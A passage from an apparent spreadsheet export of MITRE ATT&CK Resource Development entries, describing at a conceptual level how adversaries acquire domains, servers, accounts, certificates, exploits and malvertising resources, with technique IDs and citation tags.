Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)
Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)
Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)</t>
  </si>
  <si>
    <t>T1583.008</t>
  </si>
  <si>
    <t>Acquire Infrastructure: Malvertising</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may purchase online advertisements that can be abused to distribute malware to victims. Ads can be purchased to plant as well as favorably position artifacts in specific locations  online, such as prominently placed within search engine results. These ads may make it more difficult for users to distinguish between actual search results and advertisements.(Citation: spamhaus-malvertising) Purchased ads may also target specific audiences using the advertising network’s capabilities, potentially further taking advantage of the trust inherently given to search engines and popular websites. 
Adversaries may purchase ads and other resources to help distribute artifacts containing malicious code to victims. Purchased ads may attempt to impersonate or spoof well-known brands. For example, these spoofed ads may trick victims into clicking the ad which could then send them to a malicious domain that may be a clone of official websites containing trojanized versions of the advertised software.(Citation: Masquerads-Guardio)(Citation: FBI-search) Adversary’s efforts to create malicious domains and purchase advertisements may also be automated at scale to better resist cleanup efforts.(Citation: sentinelone-malvertising) 
Malvertising may be used to support [Drive-by Target](https://attack.mitre.org/techniques/T1608/004) and [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), potentially requiring limited interaction from the user if the ad contains code/exploits that infect the target system's web browser.(Citation: BBC-malvertising)
Adversaries may also employ several techniques to evade detection by the advertising network. For example, adversaries may dynamically route ad clicks to send automated crawler/policy enforcer traffic to benign sites while validating potential targets then sending victims referred from real ad clicks to malicious pages. This infection vector may therefore remain hidden from the ad network as well as any visitor not reaching the malicious sites with a valid identifier from clicking on the advertisement.(Citation: Masquerads-Guardio) Other tricks, such as intentional typos to avoid brand reputation monitoring, may also be used to evade automated detection.(Citation: spamhaus-malvertising) </t>
  </si>
  <si>
    <t>T1583.004</t>
  </si>
  <si>
    <t>Acquire Infrastructure: Server</t>
  </si>
  <si>
    <t>Adversaries may buy, lease, or rent physical servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Adversaries may use web servers to support support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations. Instead of compromising a third-party [Server](https://attack.mitre.org/techniques/T1584/004) or renting a [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may opt to configure and run their own servers in support of operations.
Adversaries may only need a lightweight setup if most of their activities will take place using online infrastructure. Or, they may need to build extensive infrastructure if they want to test, communicate, and control other aspects of their activities on their own systems.(Citation: NYTStuxnet)</t>
  </si>
  <si>
    <t>T1583.007</t>
  </si>
  <si>
    <t>Acquire Infrastructure: Serverless</t>
  </si>
  <si>
    <t>Adversaries may purchase and configure serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them.
Once acquired, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command &amp; Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)</t>
  </si>
  <si>
    <t>T1583.003</t>
  </si>
  <si>
    <t>Acquire Infrastructure: Virtual Private Server</t>
  </si>
  <si>
    <t>Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
Acquiring a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers. Adversaries may also acquire infrastructure from VPS service providers that are known for renting VPSs with minimal registration information, allowing for more anonymous acquisitions of infrastructure.(Citation: TrendmicroHideoutsLease)</t>
  </si>
  <si>
    <t>T1583.006</t>
  </si>
  <si>
    <t>Acquire Infrastructure: Web Services</t>
  </si>
  <si>
    <t>Adversaries may register for web services that can be used during targeting. A variety of popular websites exist for adversaries to register for a web-based service that can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566). Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, adversaries can make it difficult to physically tie back operations to them.</t>
  </si>
  <si>
    <t>T1586.003</t>
  </si>
  <si>
    <t>Compromise Accounts: Cloud Accounts</t>
  </si>
  <si>
    <t>Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021)</t>
  </si>
  <si>
    <t>T1586.002</t>
  </si>
  <si>
    <t>Compromise Accounts: Email Accounts</t>
  </si>
  <si>
    <t>Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598), [Phishing](https://attack.mitre.org/techniques/T1566), or large-scale spam email campaigns. Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship with, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).
A variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, brute forcing credentials (ex: password reuse from breach credential dumps), or paying employees, suppliers or business partners for access to credentials.(Citation: AnonHBGary)(Citation: Microsoft DEV-0537) Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. Adversaries may target compromising well-known email accounts or domains from which malicious spam or [Phishing](https://attack.mitre.org/techniques/T1566) emails may evade reputation-based email filtering rules.
Adversaries can use a compromised email account to hijack existing email threads with targets of interest.</t>
  </si>
  <si>
    <t>T1586.001</t>
  </si>
  <si>
    <t>Compromise Accounts: Social Media Accounts</t>
  </si>
  <si>
    <t>Adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating social media profiles (i.e. [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001)), adversaries may compromise existing social media accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. 
A variety of methods exist for compromising social media accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising social media accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.
Personas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Compromised social media accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.
Adversaries can use a compromised social media profile to create new, or hijack existing, connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) Compromised profiles may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).</t>
  </si>
  <si>
    <t>T1584.005</t>
  </si>
  <si>
    <t>Compromise Infrastructure: Botnet</t>
  </si>
  <si>
    <t>Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting a botnet from a booter/stresser service, adversaries may build their own botnet by compromising numerous third-party systems.(Citation: Imperva DDoS for Hire) Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).</t>
  </si>
  <si>
    <t>T1584.001</t>
  </si>
  <si>
    <t>Compromise Infrastructure: Domains</t>
  </si>
  <si>
    <t>Adversaries may hijack domains and/or subdomains that can be used during targeting. Domain registration hijacking is the act of changing the registration of a domain name without the permission of the original registrant.(Citation: ICANNDomainNameHijacking) Adversaries may gain access to an email account for the person listed as the owner of the domain. The adversary can then claim that they forgot their password in order to make changes to the domain registration. Other possibilities include social engineering a domain registration help desk to gain access to an account or taking advantage of renewal process gaps.(Citation: Krebs DNS Hijack 2019)
Subdomain hijacking can occur when organizations have DNS entries that point to non-existent or deprovisioned resources. In such cases, an adversary may take control of a subdomain to conduct operations with the benefit of the trust associated with that domain.(Citation: Microsoft Sub Takeover 2020)
Adversaries who compromise a domain may also engage in domain shadowing by creating malicious subdomains under their control while keeping any existing DNS records. As service will not be disrupted, the malicious subdomains may go unnoticed for long periods of time.(Citation: Palo Alto Unit 42 Domain Shadowing 2022)</t>
  </si>
  <si>
    <t>T1584.004</t>
  </si>
  <si>
    <t>Compromise Infrastructure: Server</t>
  </si>
  <si>
    <t>Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations.
Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations.</t>
  </si>
  <si>
    <t>T1584.007</t>
  </si>
  <si>
    <t>Compromise Infrastructure: Serverless</t>
  </si>
  <si>
    <t>Adversaries may compromise serverless cloud infrastructure, such as Cloudflare Workers or AWS Lambda functions, that can be used during targeting. By utilizing serverless infrastructure, adversaries can make it more difficult to attribute infrastructure used during operations back to them. 
Once compromised, the serverless runtime environment can be leveraged to either respond directly to infected machines or to [Proxy](https://attack.mitre.org/techniques/T1090) traffic to an adversary-owned command and control server.(Citation: BlackWater Malware Cloudflare Workers)(Citation: AWS Lambda Redirector) As traffic generated by these functions will appear to come from subdomains of common cloud providers, it may be difficult to distinguish from ordinary traffic to these providers.(Citation: Detecting Command &amp; Control in the Cloud)(Citation: BlackWater Malware Cloudflare Workers)</t>
  </si>
  <si>
    <t>T1584.003</t>
  </si>
  <si>
    <t>Compromise Infrastructure: Virtual Private Server</t>
  </si>
  <si>
    <t>Adversaries may compromise third-party Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. Adversaries may compromise VPSs purchased by third-party entities. By compromising a VPS to use as infrastructure, adversaries can make it difficult to physically tie back operations to themselves.(Citation: NSA NCSC Turla OilRig)
Compromising a VPS for use in later stages of the adversary lifecycle, such as Command and Control, can allow adversaries to benefit from the ubiquity and trust associated with higher reputation cloud service providers as well as that added by the compromised third-party.</t>
  </si>
  <si>
    <t>T1584.006</t>
  </si>
  <si>
    <t>Compromise Infrastructure: Web Services</t>
  </si>
  <si>
    <t>Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, SendGrid, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)), [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567), or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them. Additionally, leveraging compromised web-based email services may allow adversaries to leverage the trust associated with legitimate domains.</t>
  </si>
  <si>
    <t>T1587.002</t>
  </si>
  <si>
    <t>Develop Capabilities: Code Signing Certificates</t>
  </si>
  <si>
    <t>Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
Prior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may develop self-signed code signing certificates for use in operations.</t>
  </si>
  <si>
    <t>T1587.003</t>
  </si>
  <si>
    <t>Develop Capabilities: Digital Certificates</t>
  </si>
  <si>
    <t>Adversaries may create self-signed SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner. In the case of self-signing, digital certificates will lack the element of trust associated with the signature of a third-party certificate authority (CA).
Adversaries may create self-signed SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)).
After creating a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.</t>
  </si>
  <si>
    <t>T1587.004</t>
  </si>
  <si>
    <t>Develop Capabilities: Exploits</t>
  </si>
  <si>
    <t>Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)
As with legitimate development efforts, different skill sets may be required for developing exploits. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's exploit development capabilities, provided the adversary plays a role in shaping requirements and maintains an initial degree of exclusivity to the exploit.
Adversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).</t>
  </si>
  <si>
    <t>T1585.003</t>
  </si>
  <si>
    <t>Establish Accounts: Cloud Accounts</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may create accounts with cloud providers that can be used during targeting. Adversaries can use cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, MEGA, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Establishing cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
Creating [Cloud Accounts](https://attack.mitre.org/techniques/T1585/003) may also require adversaries to establish [Email Accounts](https://attack.mitre.org/techniques/T1585/002) to register with the cloud provider. </t>
  </si>
  <si>
    <t>T1585.002</t>
  </si>
  <si>
    <t>Establish Accounts: Email Accounts</t>
  </si>
  <si>
    <t>Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) Adversaries may also take steps to cultivate a persona around the email account, such as through use of [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001), to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).(Citation: Mandiant APT1)
To decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.(Citation: Trend Micro R980 2016)</t>
  </si>
  <si>
    <t>T1585.001</t>
  </si>
  <si>
    <t>Establish Accounts: Social Media Accounts</t>
  </si>
  <si>
    <t>Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)
For operations incorporating social engineering, the utilization of a persona on social media may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single social media site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Establishing a persona  on social media may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos. 
Once a persona has been developed an adversary can use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) These accounts may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).</t>
  </si>
  <si>
    <t>T1588.003</t>
  </si>
  <si>
    <t>Obtain Capabilities: Code Signing Certificates</t>
  </si>
  <si>
    <t>Adversaries may buy and/or steal code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.
Prior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may purchase or steal code signing certificates for use in operations. The purchase of code signing certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal code signing materials directly from a compromised third-party.</t>
  </si>
  <si>
    <t>T1588.004</t>
  </si>
  <si>
    <t>Obtain Capabilities: Digital Certificates</t>
  </si>
  <si>
    <t>Adversaries may buy and/or steal SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are designed to instill trust. They include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate with its owner.
Adversaries may purchase or steal SSL/TLS certificates to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or even enabling [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) if the certificate is trusted or otherwise added to the root of trust (i.e. [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004)). The purchase of digital certificates may be done using a front organization or using information stolen from a previously compromised entity that allows the adversary to validate to a certificate provider as that entity. Adversaries may also steal certificate materials directly from a compromised third-party, including from certificate authorities.(Citation: DiginotarCompromise) Adversaries may register or hijack domains that they will later purchase an SSL/TLS certificate for.
Certificate authorities exist that allow adversaries to acquire SSL/TLS certificates, such as domain validation certificates, for free.(Citation: Let's Encrypt FAQ)
After obtaining a digital certificate, an adversary may then install that certificate (see [Install Digital Certificate](https://attack.mitre.org/techniques/T1608/003)) on infrastructure under their control.</t>
  </si>
  <si>
    <t>T1588.005</t>
  </si>
  <si>
    <t>Obtain Capabilities: Exploits</t>
  </si>
  <si>
    <t>Adversaries may buy, steal, or download exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than developing their own exploits, an adversary may find/modify exploits from online or purchase them from exploit vendors.(Citation: Exploit Database)(Citation: TempertonDarkHotel)(Citation: NationsBuying)
In addition to downloading free exploits from the internet, adversaries may purchase exploits from third-party entities. Third-party entities can include technology companies that specialize in exploit development, criminal marketplaces (including exploit kits), or from individuals.(Citation: PegasusCitizenLab)(Citation: Wired SandCat Oct 2019) In addition to purchasing exploits, adversaries may steal and repurpose exploits from third-party entities (including other adversaries).(Citation: TempertonDarkHotel)
An adversary may monitor exploit provider forums to understand the state of existing, as well as newly discovered, exploits. There is usually a delay between when an exploit is discovered and when it is made public. An adversary may target the systems of those known to conduct exploit research and development in order to gain that knowledge for use during a subsequent operation.
Adversaries may use exploits during various phases of the adversary lifecycle (i.e. [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190), [Exploitation for Client Execution](https://attack.mitre.org/techniques/T1203), [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), [Exploitation for Defense Evasion](https://attack.mitre.org/techniques/T1211), [Exploitation for Credential Access](https://attack.mitre.org/techniques/T1212), [Exploitation of Remote Services](https://attack.mitre.org/techniques/T1210), and [Application or System Exploitation](https://attack.mitre.org/techniques/T1499/004)).</t>
  </si>
  <si>
    <t>T1588.001</t>
  </si>
  <si>
    <t>Obtain Capabilities: Malware</t>
  </si>
  <si>
    <t>Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.
In addition to downloading free malware from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware development, criminal marketplaces (including Malware-as-a-Service, or MaaS), or from individuals. In addition to purchasing malware, adversaries may steal and repurpose malware from third-party entities (including other adversaries).</t>
  </si>
  <si>
    <t>T1588.002</t>
  </si>
  <si>
    <t>Obtain Capabilities: Tool</t>
  </si>
  <si>
    <t>Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
Adversaries may obtain tools to support their operations, including to support execution of post-compromise behaviors. In addition to freely downloading or purchasing software, adversaries may steal software and/or software licenses from third-party entities (including other adversaries).</t>
  </si>
  <si>
    <t>T1588.006</t>
  </si>
  <si>
    <t>Obtain Capabilities: Vulnerabilities</t>
  </si>
  <si>
    <t>Adversaries may acquire information about vulnerabilities that can be used during targeting. A vulnerability is a weakness in computer hardware or software that can, potentially, be exploited by an adversary to cause unintended or unanticipated behavior to occur. Adversaries may find vulnerability information by searching open databases or gaining access to closed vulnerability databases.(Citation: National Vulnerability Database)
An adversary may monitor vulnerability disclosures/databases to understand the state of existing, as well as newly discovered, vulnerabilities. There is usually a delay between when a vulnerability is discovered and when it is made public. An adversary may target the systems of those known to conduct vulnerability research (including commercial vendors). Knowledge of a vulnerability may cause an adversary to search for an existing exploit (i.e. [Exploits](https://attack.mitre.org/techniques/T1588/005)) or to attempt to develop one themselves (i.e. [Exploits](https://attack.mitre.org/techniques/T1587/004)).</t>
  </si>
  <si>
    <t>T1608.004</t>
  </si>
  <si>
    <t>Stage Capabilities: Drive-by Target</t>
  </si>
  <si>
    <t>Adversaries may prepare an operational environment to infect systems that visit a website over the normal course of browsing. Endpoint systems may be compromised through browsing to adversary controlled sites, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). In such cases, the user's web browser is typically targeted for exploitation (often not requiring any extra user interaction once landing on the site), but adversaries may also set up websites for non-exploitation behavior such as [Application Access Token](https://attack.mitre.org/techniques/T1550/001). Prior to [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), adversaries must stage resources needed to deliver that exploit to users who browse to an adversary controlled site. Drive-by content can be staged on adversary controlled infrastructure that has been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).
Adversaries may upload or inject malicious web content, such as [JavaScript](https://attack.mitre.org/techniques/T1059/007), into websites.(Citation: FireEye CFR Watering Hole 2012)(Citation: Gallagher 2015) This may be done in a number of ways, including:
* Inserting malicious scripts into web pages or other user controllable web content such as forum posts
* Modifying script files served to websites from publicly writeable cloud storage buckets
* Crafting malicious web advertisements and purchasing ad space on a website through legitimate ad providers (i.e., [Malvertising](https://attack.mitre.org/techniques/T1583/008))
In addition to staging content to exploit a user's web browser, adversaries may also stage scripting content to profile the user's browser (as in [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592)) to ensure it is vulnerable prior to attempting exploitation.(Citation: ATT ScanBox)
Websites compromised by an adversary and used to stage a drive-by may be ones visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is referred to a strategic web compromise or watering hole attack.
Adversaries may purchase domains similar to legitimate domains (ex: homoglyphs, typosquatting, different top-level domain, etc.) during acquisition of infrastructure ([Domains](https://attack.mitre.org/techniques/T1583/001)) to help facilitate [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).</t>
  </si>
  <si>
    <t>T1608.003</t>
  </si>
  <si>
    <t>Stage Capabilities: Install Digital Certificate</t>
  </si>
  <si>
    <t>Adversaries may install SSL/TLS certificates that can be used during targeting. SSL/TLS certificates are files that can be installed on servers to enable secure communications between systems. Digital certificates include information about the key, information about its owner's identity, and the digital signature of an entity that has verified the certificate's contents are correct. If the signature is valid, and the person examining the certificate trusts the signer, then they know they can use that key to communicate securely with its owner. Certificates can be uploaded to a server, then the server can be configured to use the certificate to enable encrypted communication with it.(Citation: DigiCert Install SSL Cert)
Adversaries may install SSL/TLS certificates that can be used to further their operations, such as encrypting C2 traffic (ex: [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002) with [Web Protocols](https://attack.mitre.org/techniques/T1071/001)) or lending credibility to a credential harvesting site. Installation of digital certificates may take place for a number of server types, including web servers and email servers. 
Adversaries can obtain digital certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) or create self-signed certificates (see [Digital Certificates](https://attack.mitre.org/techniques/T1587/003)). Digital certificates can then be installed on adversary controlled infrastructure that may have been acquired ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or previously compromised ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).</t>
  </si>
  <si>
    <t>T1608.005</t>
  </si>
  <si>
    <t>Stage Capabilities: Link Target</t>
  </si>
  <si>
    <t>Adversaries may put in place resources that are referenced by a link that can be used during targeting. An adversary may rely upon a user clicking a malicious link in order to divulge information (including credentials) or to gain execution, as in [Malicious Link](https://attack.mitre.org/techniques/T1204/001). Links can be used for spearphishing, such as sending an email accompanied by social engineering text to coax the user to actively click or copy and paste a URL into a browser. Prior to a phish for information (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1598/003)) or a phish to gain initial access to a system (as in [Spearphishing Link](https://attack.mitre.org/techniques/T1566/002)), an adversary must set up the resources for a link target for the spearphishing link. 
